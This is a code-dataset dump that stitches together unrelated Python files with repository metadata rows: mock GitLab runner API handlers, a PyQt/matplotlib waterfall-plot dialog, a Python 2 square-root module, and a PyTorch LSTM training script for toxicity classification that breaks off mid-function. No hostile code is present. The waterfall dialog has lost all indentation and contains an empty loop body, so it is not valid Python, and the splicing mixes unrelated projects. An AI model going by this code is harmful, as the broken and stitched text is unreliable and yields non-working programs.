    payload = ('{"active": true,"description": "test-1-20150125","id": 1,'
               '"is_shared": false,"ip_address": "127.0.0.1","name": null,'
               '"online": true,"status": "online"}')
    return response(201, payload.encode("utf-8"), {"content-type": "application/json"}, None, 5, request)
@urlmatch(scheme="http", netloc="localhost", path="/api/v4/runners/1", method="delete")
def resp_delete_runner(url, request):
    """Mock DELETE /api/v4/runners/1: successful deletion (204)."""
    return response(204, "{}".encode("utf-8"), {"content-type": "application/json"}, None, 5, request)
| [
"joshuamadison+gh@gmail.com"
] | joshuamadison+gh@gmail.com |
f7160dd06a6cbc907cf9333e3f2cc9eed3e33370 | 3365e4d4fc67bbefe4e8c755af289c535437c6f4 | /.history/src/core/dialogs/waterfall_dialog_20170814160354.py | 48b7fc0363101051bbb0b422d90056e63e785730 | [] | no_license | kiranhegde/OncoPlotter | f3ab9cdf193e87c7be78b16501ad295ac8f7d2f1 | b79ac6aa9c6c2ca8173bc8992ba3230aa3880636 | refs/heads/master | 2021-05-21T16:23:45.087035 | 2017-09-07T01:13:16 | 2017-09-07T01:13:16 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 8,510 | py | '''
Refs:
Embedding plot: https://sukhbinder.wordpress.com/2013/12/16/simple-pyqt-and-matplotlib-example-with-zoompan/
'''
from matplotlib.backends.backend_qt5agg import FigureCanvasQTAgg as FigureCanvas
from matplotlib.backends.backend_qt5agg import NavigationToolbar2QT as NavigationToolbar
import matplotlib.pyplot as plt
from PyQt5.QtWidgets import (QHeaderView, QApplication, QDialog, QWidget, QPushButton, QVBoxLayout, QTreeWidget, QTreeWidgetItem, QComboBox)
from PyQt5 import QtCore, QtGui
import core.gui.waterfall as waterfall
import numpy as np
from pprint import pprint
class CustomCombo(QComboBox):
def __init__(self,parent,bar_keys_colors):
super(QComboBox,self).__init__(parent)
#keys is a dictionary: {'key description':color,...}
self.keys = list(bar_keys_colors.keys())
def populate(self):
'''Override method to add items to list'''
for key in self.keys:
class Waterfall(QWidget, waterfall.Ui_Waterfall):
general_settings_signal = QtCore.pyqtSignal(list) #send list of plotting params
updated_rectangles_signal = QtCore.pyqtSignal(list) #send list of updated artists for redrawing
def __init__(self, parent):
super(Waterfall,self).__init__(parent)
self.setupUi(self)
#Button functions
self.btn_apply_general_settings.clicked.connect(self.send_settings)
self.patient_tree = self.create_patient_tree()
self.data_viewer_container.addWidget(self.patient_tree)
def on_waterfall_data_signal(self,signal):
self.waterfall_data = signal['waterfall_data'] #pandas dataframe
def on_generated_rectangles_signal(self,signal):
self.rectangles_received = signal[0]
self.add_items() #display in table
#print(self.rectangles_received)
def send_settings(self,signal):
self.list_general_settings = [
self.plot_title.text(),
self.x_label.text(),
self.y_label.text(),
self.twenty_percent_line.isChecked(),
self.thirty_percent_line.isChecked(),
self.zero_percent_line.isChecked(),
self.display_responses_as_text.isChecked()
]
self.general_settings_signal.emit(self.list_general_settings)
def create_patient_tree(self):
'''
Create QTreeWidget populated with a patient's data for the DataEntry dialog.
Assumes that self.temp_patient is the patient of interest and that the variable belongs to the dialog.
'''
self.tree = QTreeWidget()
self.root = self.tree.invisibleRootItem()
self.headers = [
'Patient #',
'Best response %',
'Overall response',
'Cancer',
'Color coding key',
]
self.headers_item = QTreeWidgetItem(self.headers)
self.tree.setColumnCount(len(self.headers))
self.tree.setHeaderItem(self.headers_item)
self.root.setExpanded(True)
self.tree.header().setSectionResizeMode(QHeaderView.ResizeToContents)
self.tree.header().setStretchLastSection(False)
return self.tree
def add_items(self):
'''
Populate viewing tree
'''
self.tree.clear() #clear prior to entering items, prevent aggregation
i=0
for rect in self.rectangles_received:
#populate editable tree with rect data
self.rect_item = QTreeWidgetItem(self.root)
self.rect_params = [
self.waterfall_data['Patient number'][i],
rect.get_height(),
self.waterfall_data['Overall response'][i],
self.waterfall_data['Cancer'][i]
]
for col in range(0,4):
self.rect_item.setText(col,str(self.rect_params[col]))
self.rect_item.setTextAlignment(col,4)
self.tree.setItemWidget(self.rect_item, 4, QComboBox())
self.rect_item.setFlags(self.rect_item.flags() | QtCore.Qt.ItemIsEditable)
i+=1
def on_updated_tree_item(self):
#update the rectangle which was edited
pass
class WaterfallPlotter(QWidget):
generated_rectangles_signal = QtCore.pyqtSignal(list) #send list of rects for data display in tree
def __init__(self,parent):
super(WaterfallPlotter,self).__init__(parent)
self.figure = plt.figure()
self.canvas = FigureCanvas(self.figure)
self.toolbar = NavigationToolbar(self.canvas,self)
self.btn_plot = QPushButton('Default Plot')
self.btn_plot.clicked.connect(self.default_plot)
self.layout = QVBoxLayout()
self.layout.addWidget(self.toolbar)
self.layout.addWidget(self.canvas)
self.layout.addWidget(self.btn_plot)
self.setLayout(self.layout)
def on_waterfall_data_signal(self,signal):
self.waterfall_data = signal['waterfall_data'] #pandas dataframe
self.btn_plot.setEnabled(True)
def on_general_settings_signal(self,signal):
try:
hasattr(self,'ax')
self.ax.set_title(signal[0])
self.ax.set_xlabel(signal[1])
self.ax.set_ylabel(signal[2])
self.canvas.draw()
except Exception as e:
print(e)
def default_plot(self):
'''
Plot waterfall data
'''
self.figure.clear()
self.rect_locations = np.arange(len(self.waterfall_data['Best response percent change']))
self.ax = self.figure.add_subplot(111)
self.ax.axhline(y=20, linestyle='--', c='k', alpha=0.5, lw=2.0, label='twenty_percent')
self.ax.axhline(y=-30, linestyle='--', c='k', alpha=0.5, lw=2.0, label='thirty_percent')
self.ax.axhline(y=0, c='k', alpha=1, lw=2.0, label='zero_percent')
self.ax.grid(color = 'k', axis = 'y', alpha=0.25)
self.rects = self.ax.bar(self.rect_locations,self.waterfall_data['Best response percent change'])
self.auto_label_responses(self.ax, self.rects, self.waterfall_data)
#self.plot_table()
self.canvas.draw()
self.ax.hold(False) #rewrite the plot when plot() called
self.generated_rectangles_signal.emit([self.rects])
def plot_table(self):
rows = ['%s' % x for x in self.waterfall_data.keys()]
rows = rows[4:] #skip first three, they are the 4 standard headers, rest are table rows
columns = self.waterfall_data['Patient number'] #patient numbers
cell_text = []
for row in rows:
cell_text_temp = []
for col in range(len(columns)):
cell_text_temp.append(self.waterfall_data[row][col])
cell_text.append(cell_text_temp)
the_table = plt.table(cellText=cell_text, rowLabels=rows, colLabels=columns, loc='bottom', cellLoc='center')
plt.subplots_adjust(bottom=0.15,left=0.5)
self.ax.set_xlim(-0.5,len(columns)-0.5)
plt.tick_params(
axis='x', # changes apply to the x-axis
which='both', # both major and minor ticks are affected
bottom='off', # ticks along the bottom edge are off
top='off', # ticks along the top edge are off
labelbottom='off'
) # labels along the bottom edge are off
def update_plot(self):
'''
TODO
'''
pass
def auto_label_responses(self, ax, rects, waterfall_data):
'''Add labels above/below bars'''
i = 0
for rect in rects:
height = rect.get_height()
if height >= 0:
valign = 'bottom'
else:
valign = 'top'
ax.text(rect.get_x() + rect.get_width()/2., height,
'%s' % waterfall_data['Overall response'][i], ha='center', va=valign)
i+=1
| [
"ngoyal95@terpmail.umd.edu"
] | ngoyal95@terpmail.umd.edu |
7710a9642e9f3d373a1295f5cfb9c1067f40da35 | be4892e723db5039c56f961e117cb95258168eca | /lectures/lecture6/mysqrt.py | 6c1b85a74369b42e6707344be08f3d44fe3a4d16 | [] | no_license | Physicist91/uwhpsc | 121ebef0d0cd9fd7b038f97b4cb93a1f2272844a | d3ce5217796c82b19c131a04d7aecad1b9c4bae2 | refs/heads/master | 2021-01-10T21:12:00.235642 | 2014-04-05T23:29:07 | 2014-04-05T23:29:07 | 19,096,883 | 2 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,195 | py | """
Module for approximating sqrt.
This is a sample module developed in earlier lectures.
"""
def sqrt2(x, debug=False):
"""
more details.
"""
from numpy import nan
if x==0.:
return 0.
elif x<0:
print "*** Error, x must be nonnegative"
return nan
assert x>0. and type(x) is float, "Unrecognized input"
s = 1.
kmax = 100
tol = 1.e-14
for k in range(kmax):
if debug:
print "Before iteration %s, s = %20.15f" % (k,s)
s0 = s
s = 0.5 * (s + x/s)
delta_s = s - s0
if abs(delta_s / x) < tol:
break
if debug:
print "After %s iterations, s = %20.15f" % (k+1,s)
return s
def test():
from numpy import sqrt
xvalues = [0., 2., 100., 10000., 1.e-4]
for x in xvalues:
print "Testing with x = %20.15e" % x
s = sqrt2(x)
s_numpy = sqrt(x)
print " s = %20.15e, numpy.sqrt = %20.15e" \
% (s, s_numpy)
assert abs(s - s_numpy) < 1e-14, \
"Disagree for x = %20.15e" % x
if __name__ == "__main__":
print "Running test... "
test()
| [
"rjl@ned"
] | rjl@ned |
c800444c8660c118459576653ce9354ba013b186 | 696972c107ba96341875bab03dbb92e9337e2924 | /train_pytorch/train42_architecture.py | ff12674e510873c287c3c17c1bd6a7dd7eb26edd | [] | no_license | Dongfeng-He/nb | 577d3d5a5f0ec585f132946eb9b6475f6e6856bb | 1d65be2f98a72ae1bd58363bba42b5f1e8e7ac49 | refs/heads/master | 2020-05-29T15:37:29.882797 | 2019-08-09T02:11:25 | 2019-08-09T02:11:25 | 189,225,420 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 29,777 | py | import os
import pandas as pd
import random
import copy
from keras.preprocessing import text, sequence
import torch
from torch import nn
from torch.utils import data
from torch.nn import functional as F
import numpy as np
import time
import math
import gc
from sklearn.metrics import roc_auc_score
class JigsawEvaluator:
def __init__(self, y_true, y_identity, power=-5, overall_model_weight=0.25):
self.y = (y_true >= 0.5).astype(int)
self.y_i = (y_identity >= 0.5).astype(int)
self.n_subgroups = self.y_i.shape[1]
self.power = power
self.overall_model_weight = overall_model_weight
@staticmethod
def _compute_auc(y_true, y_pred):
try:
return roc_auc_score(y_true, y_pred)
except ValueError:
return np.nan
def _compute_subgroup_auc(self, i, y_pred):
mask = self.y_i[:, i] == 1
return self._compute_auc(self.y[mask], y_pred[mask])
def _compute_bpsn_auc(self, i, y_pred):
mask = self.y_i[:, i] + self.y == 1
return self._compute_auc(self.y[mask], y_pred[mask])
def _compute_bnsp_auc(self, i, y_pred):
mask = self.y_i[:, i] + self.y != 1
return self._compute_auc(self.y[mask], y_pred[mask])
def compute_bias_metrics_for_model(self, y_pred):
records = np.zeros((3, self.n_subgroups))
for i in range(self.n_subgroups):
records[0, i] = self._compute_subgroup_auc(i, y_pred)
records[1, i] = self._compute_bpsn_auc(i, y_pred)
records[2, i] = self._compute_bnsp_auc(i, y_pred)
return records
def _calculate_overall_auc(self, y_pred):
return roc_auc_score(self.y, y_pred)
def _power_mean(self, array):
total = sum(np.power(array, self.power))
return np.power(total / len(array), 1 / self.power)
def get_final_metric(self, y_pred):
bias_metrics = self.compute_bias_metrics_for_model(y_pred)
bias_score = np.average([
self._power_mean(bias_metrics[0]),
self._power_mean(bias_metrics[1]),
self._power_mean(bias_metrics[2])
])
overall_score = self.overall_model_weight * self._calculate_overall_auc(y_pred)
bias_score = (1 - self.overall_model_weight) * bias_score
return overall_score + bias_score
class FocalLoss(nn.Module):
def __init__(self, alpha=1, gamma=2, logits=True, reduce=False):
super(FocalLoss, self).__init__()
self.alpha = alpha
self.gamma = gamma
self.logits = logits
self.reduce = reduce
def forward(self, inputs, targets):
if self.logits:
bce_loss = nn.BCEWithLogitsLoss(reduction="none")(inputs, targets)
else:
bce_loss = nn.BCELoss(reduction="none")(inputs, targets)
pt = torch.exp(-bce_loss)
focal_loss = self.alpha * (1-pt)**self.gamma * bce_loss
#focal_loss = (1 - pt) ** self.gamma * bce_loss
if self.reduce:
return torch.mean(focal_loss)
else:
return focal_loss
class SpatialDropout(nn.Dropout2d):
def forward(self, x):
x = x.unsqueeze(2) # (N, T, 1, K)
x = x.permute(0, 3, 2, 1) # (N, K, 1, T)
x = super(SpatialDropout, self).forward(x) # (N, K, 1, T), some features are masked
x = x.permute(0, 3, 2, 1) # (N, T, 1, K)
x = x.squeeze(2) # (N, T, K)
return x
class NeuralNet(nn.Module):
def __init__(self, embedding_matrix):
super(NeuralNet, self).__init__()
unique_word_num = embedding_matrix.shape[0]
embed_size = embedding_matrix.shape[1]
lstm_size = 128
dense_size = 512
# 嵌入层
self.embedding = nn.Embedding(unique_word_num, embed_size)
self.embedding.weight = nn.Parameter(torch.tensor(embedding_matrix, dtype=torch.float32))
self.embedding.weight.requires_grad = False
self.embedding_dropout = SpatialDropout(0.3)
# LSTM
self.lstm1 = nn.LSTM(embed_size, lstm_size, bidirectional=True, batch_first=True)
self.lstm2 = nn.LSTM(lstm_size * 2, lstm_size, bidirectional=True, batch_first=True)
# 全连接层
self.linear1 = nn.Linear(dense_size, dense_size)
self.linear2 = nn.Linear(dense_size, dense_size)
self.linear3 = nn.Linear(dense_size * 2, dense_size)
# 输出层
self.linear_out = nn.Linear(dense_size, 1)
self.linear_aux_out = nn.Linear(dense_size, 5)
self.linear_identity_out = nn.Linear(dense_size, 9)
self.linear_np_out = nn.Linear(dense_size, 4)
self.linear_identity_out2 = nn.Linear(dense_size, dense_size)
self.bn1 = nn.BatchNorm1d(dense_size)
self.bn2 = nn.BatchNorm1d(dense_size)
def forward(self, x):
# 嵌入层
h_embedding = self.embedding(x)
h_embedding = self.embedding_dropout(h_embedding)
# LSTM
h_lstm1, _ = self.lstm1(h_embedding)
h_lstm2, _ = self.lstm2(h_lstm1)
# pooling
avg_pool = torch.mean(h_lstm2, 1)
max_pool, _ = torch.max(h_lstm2, 1)
# 全连接层
h_conc = torch.cat((max_pool, avg_pool), 1)
identity_hidden = self.linear_identity_out2(h_conc)
identity_hidden = F.relu(identity_hidden)
#identity_hidden = self.bn1(identity_hidden)
identity_hidden = F.dropout(identity_hidden, p=0.3)
np_result = self.linear_np_out(identity_hidden)
h_conc2 = torch.cat((h_conc, identity_hidden), 1)
gate_hidden = self.linear3(h_conc2)
#gate_hidden = self.bn2(gate_hidden)
gate = torch.sigmoid(gate_hidden)
#gate = F.dropout(gate, p=0.3)
h_conc = h_conc * gate
h_conc_linear1 = F.relu(self.linear1(h_conc))
h_conc_linear2 = F.relu(self.linear2(h_conc))
# 拼接
hidden = h_conc + h_conc_linear1 + h_conc_linear2
# 输出层,用 sigmoid 就用 BCELoss,不用 sigmoid 就用 BCEWithLogitsLoss
result = self.linear_out(hidden)
aux_result = self.linear_aux_out(hidden)
out = torch.cat([result, aux_result, np_result], 1)
return out
class Trainer:
def __init__(self, model_name, epochs=5, batch_size=512, part=1., seed=1234, debug_mode=False):
self.debug_mode = debug_mode
self.model_name = model_name
self.seed = seed
self.identity_list = ['male', 'female', 'homosexual_gay_or_lesbian', 'christian', 'jewish', 'muslim', 'black', 'white', 'psychiatric_or_mental_illness']
self.toxicity_type_list = ['severe_toxicity', 'obscene', 'identity_attack', 'insult', 'threat']
if part == 1.:
self.weight_dict = {"severe_toxicity": 1000, "obscene": 235, "identity_attack": 236, "insult": 22,
"threat": 646, "male": 45, "female": 35, "homosexual_gay_or_lesbian": 176, "christian": 50,
"jewish": 249, "muslim": 91, "black": 130, "white": 75, "psychiatric_or_mental_illness": 442,
"pp": 101, "np": 13, "pn": 20, "nn": 1,
"pp_male": 431, "np_male": 50, "pn_male": 17, "nn_male": 1,
"pp_female": 384, "np_female": 39, "pn_female": 17, "nn_female": 1,
"pp_homosexual_gay_or_lesbian": 900, "np_homosexual_gay_or_lesbian": 219, "pn_homosexual_gay_or_lesbian": 17, "nn_homosexual_gay_or_lesbian": 1,
"pp_christian": 859, "np_christian": 54, "pn_christian": 17, "nn_christian": 1,
"pp_jewish": 2365, "np_jewish": 278, "pn_jewish": 17, "nn_jewish": 1,
"pp_muslim": 606, "np_muslim": 108, "pn_muslim": 17, "nn_muslim": 1,
"pp_black": 586, "np_black": 167, "pn_black": 17, "nn_black": 1,
"pp_white": 387, "np_white": 94, "pn_white": 17, "nn_white": 1,
"pp_psychiatric_or_mental_illness": 2874, "np_psychiatric_or_mental_illness": 523, "pn_psychiatric_or_mental_illness": 17, "nn_psychiatric_or_mental_illness": 1}
else:
self.weight_dict = {"severe_toxicity": 1000, "obscene": 196, "identity_attack": 278, "insult": 22,
"threat": 609, "male": 45, "female": 33, "homosexual_gay_or_lesbian": 198, "christian": 48,
"jewish": 243, "muslim": 133, "black": 131, "white": 90, "psychiatric_or_mental_illness": 369,
"pp": 107, "np": 13, "pn": 19, "nn": 1,
"pp_male": 434, "np_male": 51, "pn_male": 17, "nn_male": 1,
"pp_female": 324, "np_female": 37, "pn_female": 17, "nn_female": 1,
"pp_homosexual_gay_or_lesbian": 1055, "np_homosexual_gay_or_lesbian": 244, "pn_homosexual_gay_or_lesbian": 17, "nn_homosexual_gay_or_lesbian": 1,
"pp_christian": 986, "np_christian": 50, "pn_christian": 17, "nn_christian": 1,
"pp_jewish": 2680, "np_jewish": 268, "pn_jewish": 16, "nn_jewish": 1,
"pp_muslim": 772, "np_muslim": 161, "pn_muslim": 17, "nn_muslim": 1,
"pp_black": 633, "np_black": 165, "pn_black": 17, "nn_black": 1,
"pp_white": 465, "np_white": 111, "pn_white": 17, "nn_white": 1,
"pp_psychiatric_or_mental_illness": 2748, "np_psychiatric_or_mental_illness": 427, "pn_psychiatric_or_mental_illness": 16, "nn_psychiatric_or_mental_illness": 1}
self.stopwords = '!"#$%&()*+,-./:;<=>?@[\\]^_`{|}~\t\n“”’\'∞θ÷α•à−β∅³π‘₹´°£€\×™√²—'
self.seed_everything()
self.max_len = 220
self.epochs = epochs
self.batch_size = batch_size
self.split_ratio = 0.95
self.sample_num = 1804874
if not self.debug_mode:
self.train_df = pd.read_csv("../input/jigsaw-unintended-bias-in-toxicity-classification/predict.csv").sample(int(self.sample_num * part), random_state=1234).fillna(0.)
self.test_df = pd.read_csv("../input/jigsaw-unintended-bias-in-toxicity-classification/test.csv")
else:
self.train_df = pd.read_csv("../input/jigsaw-unintended-bias-in-toxicity-classification/predict.csv").head(1000).fillna(0.)
self.test_df = pd.read_csv("../input/jigsaw-unintended-bias-in-toxicity-classification/test.csv").head(1000)
self.train_len = int(len(self.train_df) * self.split_ratio)
self.evaluator = self.init_evaluator()
def seed_everything(self):
random.seed(self.seed)
os.environ['PYTHONHASHSEED'] = str(self.seed)
np.random.seed(self.seed)
torch.manual_seed(self.seed)
torch.cuda.manual_seed(self.seed)
torch.backends.cudnn.deterministic = True
def init_evaluator(self):
# 初始化评分函数类
y_true = self.train_df['target'].values
y_identity = self.train_df[self.identity_list].values
valid_y_true = y_true[self.train_len:]
valid_y_identity = y_identity[self.train_len:]
evaluator = JigsawEvaluator(valid_y_true, valid_y_identity) # y_true 必须是0或1,不能是离散值
return evaluator
def create_dataloader(self):
# 读取输入输出
train_comments = self.train_df["comment_text"].astype(str)
train_label = self.train_df["target"].values
train_type_labels = self.train_df[self.toxicity_type_list].values
# 新的 np 任务
train_np_labels = np.zeros((len(self.train_df), 4))
train_np_identity_labels = np.zeros((len(self.train_df), len(self.identity_list) * 4))
train_df_copy = self.train_df[self.identity_list + ["target"]]
for column in self.identity_list + ["target"]:
train_df_copy[column] = np.where(train_df_copy[column] > 0.5, True, False)
pp_label_bool = train_df_copy["target"] & np.where(train_df_copy[self.identity_list].sum(axis=1) > 0, True, False)
np_label_bool = ~train_df_copy["target"] & np.where(train_df_copy[self.identity_list].sum(axis=1) > 0, True, False)
pn_label_bool = train_df_copy["target"] & np.where((train_df_copy[self.identity_list]).sum(axis=1) == 0, True, False)
nn_label_bool = ~train_df_copy["target"] & np.where((train_df_copy[self.identity_list]).sum(axis=1) == 0, True, False)
train_np_labels[:, 0] = np.where(pp_label_bool > 0, 1, 0)
train_np_labels[:, 1] = np.where(np_label_bool > 0, 1, 0)
train_np_labels[:, 2] = np.where(pn_label_bool > 0, 1, 0)
train_np_labels[:, 3] = np.where(nn_label_bool > 0, 1, 0)
for i, column in enumerate(self.identity_list):
pp_label_bool = train_df_copy["target"] & train_df_copy[column]
np_label_bool = ~train_df_copy["target"] & train_df_copy[column]
pn_label_bool = train_df_copy["target"] & (~train_df_copy[column])
nn_label_bool = ~train_df_copy["target"] & (~train_df_copy[column])
train_np_identity_labels[:, i * 4 + 0] = np.where(pp_label_bool > 0, 1, 0)
train_np_identity_labels[:, i * 4 + 1] = np.where(np_label_bool > 0, 1, 0)
train_np_identity_labels[:, i * 4 + 2] = np.where(pn_label_bool > 0, 1, 0)
train_np_identity_labels[:, i * 4 + 3] = np.where(nn_label_bool > 0, 1, 0)
# 身份原始值
train_identity_values = self.train_df[self.identity_list].fillna(0.).values
# 所有身份原始值之和
train_identity_sum = train_identity_values.sum(axis=1)
# 将身份之和限制在1以下(sigmoid)
train_identity_sum_label = np.where(train_identity_sum > 1, 1, train_identity_sum)
# 身份01值
train_identity_binary = copy.deepcopy(self.train_df[self.identity_list])
for column in self.identity_list:
train_identity_binary[column] = np.where(train_identity_binary[column] > 0.5, 1, 0)
# 身份01值有一个就算1
train_identity_binary_sum = train_identity_binary.sum(axis=1)
train_identity_or_binary = np.where(train_identity_binary_sum >= 1, 1, 0)
# 所有身份标签
train_identity_type_labels = train_identity_values
train_identity_type_binary_lables = train_identity_binary
train_identity_sum_label = train_identity_sum_label
train_identity_binary_label = train_identity_or_binary
# tokenizer 训练
test_comments = self.test_df["comment_text"].astype(str)
tokenizer = text.Tokenizer(filters=self.stopwords)
tokenizer.fit_on_texts(list(train_comments) + list(test_comments)) # train_comments 是 dataframe 的一列,是 Series 类, list(train_comments) 直接变成 list
# tokenization
train_tokens = tokenizer.texts_to_sequences(train_comments) # 可以给 Series 也可以给 list?
test_tokens = tokenizer.texts_to_sequences(test_comments)
# 用 sequence 类补到定长
train_tokens = sequence.pad_sequences(train_tokens, maxlen=self.max_len)
test_tokens = sequence.pad_sequences(test_tokens, maxlen=self.max_len)
# 划分训练集和验证集
valid_tokens = train_tokens[self.train_len:]
valid_label = train_label[self.train_len:]
valid_type_labels = train_type_labels[self.train_len:]
train_tokens = train_tokens[:self.train_len]
train_label = train_label[:self.train_len]
train_type_labels = train_type_labels[:self.train_len]
valid_identity_type_labels = train_identity_type_labels[self.train_len:]
train_identity_type_labels = train_identity_type_labels[:self.train_len]
valid_identity_type_binary_lables = train_identity_type_binary_lables[self.train_len:]
train_identity_type_binary_lables = train_identity_type_binary_lables[:self.train_len]
valid_identity_sum_label = train_identity_sum_label[self.train_len:]
train_identity_sum_label = train_identity_sum_label[:self.train_len]
valid_identity_binary_label = train_identity_binary_label[self.train_len:]
train_identity_binary_label = train_identity_binary_label[:self.train_len]
valid_np_labels = train_np_labels[self.train_len:]
train_np_labels = train_np_labels[:self.train_len]
valid_np_identity_labels = train_np_identity_labels[self.train_len:]
train_np_identity_labels = train_np_identity_labels[:self.train_len]
# 计算样本权重
target_weight, aux_weight, identity_weight, np_weight, np_identity_weight = self.cal_sample_weights()
#train_np_labels
#train_np_identity_labels
# 将符号化数据转成 tensor
train_x_tensor = torch.tensor(train_tokens, dtype=torch.long)
valid_x_tensor = torch.tensor(valid_tokens, dtype=torch.long)
train_y_tensor = torch.tensor(np.hstack([train_label[:, np.newaxis], train_type_labels, train_identity_type_labels, train_np_labels]), dtype=torch.float32)
valid_y_tensor = torch.tensor(np.hstack([valid_label[:, np.newaxis], valid_type_labels, valid_identity_type_labels, valid_np_labels]), dtype=torch.float32)
target_weight_tensor = torch.tensor(target_weight, dtype=torch.float32)
aux_weight_tensor = torch.tensor(aux_weight, dtype=torch.float32)
identity_weight_tensor = torch.tensor(identity_weight, dtype=torch.float32)
np_weight_tensor = torch.tensor(np_weight, dtype=torch.float32)
np_identity_weight_tensor = torch.tensor(np_identity_weight, dtype=torch.float32)
if torch.cuda.is_available():
train_x_tensor = train_x_tensor.cuda()
valid_x_tensor = valid_x_tensor.cuda()
train_y_tensor = train_y_tensor.cuda()
valid_y_tensor = valid_y_tensor.cuda()
target_weight_tensor = target_weight_tensor.cuda()
aux_weight_tensor = aux_weight_tensor.cuda()
identity_weight_tensor = identity_weight_tensor.cuda()
np_weight_tensor = np_weight_tensor.cuda()
np_identity_weight_tensor = np_identity_weight_tensor.cuda()
# 将 tensor 转成 dataset,训练数据和标签一一对应,用 dataloader 加载的时候 dataset[:-1] 是 x,dataset[-1] 是 y
train_dataset = data.TensorDataset(train_x_tensor, train_y_tensor, target_weight_tensor, aux_weight_tensor, identity_weight_tensor, np_weight_tensor, np_identity_weight_tensor)
valid_dataset = data.TensorDataset(valid_x_tensor, valid_y_tensor)
# 将 dataset 转成 dataloader
train_loader = torch.utils.data.DataLoader(train_dataset, batch_size=self.batch_size, shuffle=True)
valid_loader = torch.utils.data.DataLoader(valid_dataset, batch_size=self.batch_size, shuffle=False)
# 返回训练数据
return train_loader, valid_loader, tokenizer
def cal_sample_weights(self):
# aux weight
aux_weight = np.zeros((len(self.train_df), len(self.toxicity_type_list)))
for i, column in enumerate(self.toxicity_type_list):
weight = math.pow(self.weight_dict[column], 0.5)
aux_weight[:, i] = np.where(self.train_df[column] > 0.5, weight, 1)
# identity weight
identity_weight = np.zeros((len(self.train_df), len(self.identity_list)))
for i, column in enumerate(self.identity_list):
weight = math.pow(self.weight_dict[column], 0.5)
identity_weight[:, i] = np.where(self.train_df[column] > 0.5, weight, 1)
# np weight
np_weight = np.zeros((len(self.train_df), 4))
np_identity_weight = np.zeros((len(self.train_df), len(self.identity_list) * 4))
train_df_copy = self.train_df[self.identity_list + ["target"]]
for column in self.identity_list + ["target"]:
train_df_copy[column] = np.where(train_df_copy[column] > 0.5, True, False)
pp_label_bool = train_df_copy["target"] & np.where(train_df_copy[self.identity_list].sum(axis=1) > 0, True, False)
np_label_bool = ~train_df_copy["target"] & np.where(train_df_copy[self.identity_list].sum(axis=1) > 0, True, False)
pn_label_bool = train_df_copy["target"] & np.where((train_df_copy[self.identity_list]).sum(axis=1) == 0, True, False)
nn_label_bool = ~train_df_copy["target"] & np.where((train_df_copy[self.identity_list]).sum(axis=1) == 0, True, False)
np_weight[:, 0] = np.where(pp_label_bool > 0, 1, 1)
np_weight[:, 1] = np.where(np_label_bool > 0, 1, 1)
np_weight[:, 2] = np.where(pn_label_bool > 0, 1, 1)
np_weight[:, 3] = np.where(nn_label_bool > 0, 1, 1)
for i, column in enumerate(self.identity_list):
pp_label_bool = train_df_copy["target"] & train_df_copy[column]
np_label_bool = ~train_df_copy["target"] & train_df_copy[column]
pn_label_bool = train_df_copy["target"] & (~train_df_copy[column])
nn_label_bool = ~train_df_copy["target"] & (~train_df_copy[column])
np_identity_weight[:, i * 4 + 0] = np.where(pp_label_bool > 0, self.weight_dict["pp_%s" % column], 1)
np_identity_weight[:, i * 4 + 1] = np.where(np_label_bool > 0, self.weight_dict["np_%s" % column], 1)
np_identity_weight[:, i * 4 + 2] = np.where(pn_label_bool > 0, self.weight_dict["pn_%s" % column], 1)
np_identity_weight[:, i * 4 + 3] = np.where(nn_label_bool > 0, self.weight_dict["nn_%s" % column], 1)
# target weight
for column in self.identity_list + ["target"]:
self.train_df[column] = np.where(self.train_df[column] > 0.5, True, False)
target_weight = np.ones(len(self.train_df))
target_weight += self.train_df["target"]
if False:
target_weight += (~self.train_df["target"]) * self.train_df[self.identity_list].sum(axis=1)
target_weight += self.train_df["target"] * (~self.train_df[self.identity_list]).sum(axis=1) * 5
else:
target_weight += (~self.train_df["target"]) * np.where(self.train_df[self.identity_list].sum(axis=1) > 0, 1, 0) * 3
target_weight += self.train_df["target"] * np.where((~self.train_df[self.identity_list]).sum(axis=1) > 0, 1, 0) * 3
target_weight /= target_weight.mean()
# 只留训练集
target_weight = np.array(target_weight)
target_weight = target_weight[:self.train_len]
aux_weight = aux_weight[:self.train_len, :]
identity_weight = identity_weight[:self.train_len, :]
np_weight = np_weight[:self.train_len, :]
np_identity_weight = np_identity_weight[:self.train_len, :]
return target_weight, aux_weight, identity_weight, np_weight, np_identity_weight
def create_emb_weights(self, word_index):
# 构建词向量字典
with open("../input/fasttext-crawl-300d-2m/crawl-300d-2M.vec", "r") as f:
fasttext_emb_dict = {}
for i, line in enumerate(f):
if i == 1000 and self.debug_mode: break
split = line.strip().split(" ")
word = split[0]
if word not in word_index: continue
emb = np.array([float(num) for num in split[1:]])
fasttext_emb_dict[word] = emb
with open("../input/glove840b300dtxt/glove.840B.300d.txt", "r") as f:
glove_emb_dict = {}
for i, line in enumerate(f):
if i == 1000 and self.debug_mode: break
split = line.strip().split(" ")
word = split[0]
if word not in word_index: continue
emb = np.array([float(num) for num in split[1:]])
glove_emb_dict[word] = emb
# 为训练集和测试集出现过的词构建词向量矩阵
word_embedding = np.zeros((len(word_index) + 1, 600)) # tokenizer 自动留出0用来 padding
np.random.seed(1234)
fasttext_random_emb = np.random.uniform(-0.25, 0.25, 300) # 用于 fasttext 找不到词语时
np.random.seed(1235)
glove_random_emb = np.random.uniform(-0.25, 0.25, 300) # 用于 glove 找不到词语时
for word, index in word_index.items():
# 如果找不到 emb,尝试小写或首字母大写
if word not in fasttext_emb_dict and word not in glove_emb_dict:
word = word.lower()
if word not in fasttext_emb_dict and word not in glove_emb_dict:
word = word.title()
if word not in fasttext_emb_dict and word not in glove_emb_dict:
word = word.upper()
fasttext_emb = fasttext_emb_dict[word] if word in fasttext_emb_dict else fasttext_random_emb
glove_emb = glove_emb_dict[word] if word in glove_emb_dict else glove_random_emb
word_embedding[index] = np.concatenate((fasttext_emb, glove_emb), axis=-1)
return np.array(word_embedding)
def sigmoid(self, x):
return 1 / (1 + np.exp(-x))
def custom_loss(self, y_pred, y_batch, epoch, target_weight=1., aux_weight=1., identity_weight=1., np_weight=1.):
target_pred = y_pred[:, 0]
target_true = y_batch[:, 0]
aux_pred = y_pred[:, 1: 6]
aux_true = y_batch[:, 1: 6]
np_pred = y_pred[:, 6: 10]
np_true = y_batch[:, 6: 10]
if epoch > 9:
target_loss = FocalLoss()(target_pred, target_true)
else:
target_loss = nn.BCEWithLogitsLoss(reduction="none")(target_pred, target_true)
